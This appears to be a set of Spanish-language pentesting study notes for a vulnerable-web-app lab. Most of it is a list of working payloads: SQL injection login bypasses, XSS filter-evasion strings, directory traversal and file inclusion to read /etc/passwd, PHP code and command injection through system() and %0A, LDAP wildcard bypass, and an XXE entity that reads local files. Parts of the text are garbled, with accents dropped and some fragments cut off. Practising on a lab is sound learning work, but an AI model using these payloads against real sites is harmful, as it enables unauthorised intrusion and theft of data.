Sql Injection:
Probar en los formularios y navegadores
Referencia primera http://www.antrax-labs.org/2012/01/sql-injectiondesde-cero.html
Login:
User: admin-sigue, se corte
Password: nada
User: 0 or 1=1 -que conocer al usuario
Password:nada
User: #01/01/01 or 1=1 -pero sin tener que conocer al usuario
Password:nada
User: paco
Password: paco or 1=1 Hacemos que nuestra peticion del user paco
sea verdadera
User: or 1=1
Password:
User: 1 OR 1=1, OR 1=1#
Password:
User: ' or '1'='1' --
Password:
User: %' or '0'='0
Password:
User:
Password: ORDER BY 7; esto es para comprobar el numero de
columnassi nos da un error es que el numero de columnas es inforeior a 7.
XSS:
Navegador: www.webvuln.a.php?name=<script>alert(1234)</script> en
la pantalla aparece un cuadro con 1234. Es vulnerable a XSS.
Navegador: www.webvuln.a.php?name=<sCript>alert(1234)</sCRIpt> es
una evasin por si tiene filtros la web. Si aparece 1234 en la pantalla, es vulnerable.
Hay que probar con maysculas y minsculas en las palabras script.
Navegador: www.webvuln.a.php?name=
<sc<script>ript>alert(1)</script</script>> se usa la division de la palabra
sript, dentro de otro script, por si los filtros son aun ms complejos. Otra opcin es
<iframe src="javascript:alert(123)"></iframe>
Directory Tranversal:
-
http://ruta_a_tu_vm/dirtrav/example1.php?file=../../../etc/passwd nos
mostrar el fichero, siempre que la cadena de ../ sea correcta en el
numero de veces y la web sea vulnerable.
http://ruta_a_tu_vm/dirtrav/example2.php?
file=/var/www/files/../../../etc/passwd lo mismo
http://192.168.43.159/dirtrav/example3.php?file=../../../etc/passwd%00
en este caso, usamos filtro %00
File Include:
-
/fileincl/example1.php?page=/etc/passwd
http://192.168.43.159/fileincl/example2.php?page=../upload/example1
example1 es un programa de upload.
/fileincl/example1.php?page=/etc/passwd%00
Code Injection:
-
http://192.168.43.159/codeexec/example1.php?
name=hacker".system('ls')." Lo que inyectamos es cdigo para que
nos de un listado del directorio donde estamos. Si cambiamos ls,
por cualquier opcin, podramos sacar mucha info.
http://192.168.43.159/codeexec/example2.php?order=id);}system(ls
l);//
http://192.168.43.159/codeexec/example3.php?
new=hacker&pattern=/lamer/&base=Hello lamer en esta url, insertamos la
inyeccin de cdigo en la variable de bsqueda new quedando as
http://192.168.43.159/codeexec/example3.php?new=system(ls l)
&pattern=/lamer/e&base=Hello lamer
http://192.168.43.159/codeexec/example4.php?
name=hacker.system(ls).
Command Injection:
-
http://192.168.43.159/commandexec/example2.php?ip=127.0.0.1%0Als es
una manera de saltar los filtros.
Otra opcin como antes es %0Aecho+"\n\nUname:";uname+-a
http://192.168.43.159/commandexec/example3.php?ip=127.0.0.1 haciendo
ejemplos anteriores, la web se redirige a esta primera. Es decir, su seguridad
esta basada en la redireccin a la pagina indicada. Lo que hacemos es abrir
netcat y dirigirlo a la ip victima desde nuestra maquina en el puerto 80 y lo
que hacemos es aadir GET y lo que queremos enviar. Esto lo podemos
sacar de http headers o simplemente mirar en la direccin origen.
nc IP _victima 80
http://192.168.43.159/ldap/example1.php?
username=hacker&password=hacker tenemos dos parmetros de acceso
que son username y password. Sabemos que no usando parmetros, una
aplicacin vulnerable, puede entrar directamente. El resultado de la consulta
sera:
o http://192.168.43.159/ldap/example1.php? Y entraramos
autenticados.
http://192.168.43.159/ldap/example2.php?name=hacker&password=hacker
aqu estamos autenticados como hacker. Ahora podemos ver si es vulnerable
usando la siguiente consulta:
o http://ruta_a_tu_mv/ldap/example2.php?
name=a*))&password=cualquierCosa lo que hacemos es usar * como
comodin y al poner a* estamos intentando entrar con el usuario
admin.
File upload:
-
XML atttack:
-
http://ruta_a_tu_mv/xml/example1.php?xml=<test>hacker</test> teniendo
esta web, si cambiamos el valos de xml por cualquier otro , nos dara un
error. Ese error nos da simplexml_load_string que lo que hace es
interpretar un xml pasado en un string, con lo que podemos crear el xml que
queramos y pasrselo al parmetro xml.
Por ejemplo podemos intentar mostrar un alert de javascript mediante el
siguiente payload:
http://ruta_a_tu_mv/xml/example1.php?xml=<e1><![CDATA[<img
SRC=http://4.bp.blogspot.com/BqslGY8Uqw0/UiR5oYoMaoI/AAAAAAAAAOY/wruVYb8uVi0/s1600/win
ky.gif onmouseover=javascript:alert('Attack');>]]></e1>
o tambin este otro:
http://ruta_a_tu_mv/xml/example1.php?xml=<!DOCTYPE e1 [<!
ENTITY attack SYSTEM "file:///etc/passwd" >]><e1>
%26attack;</e1>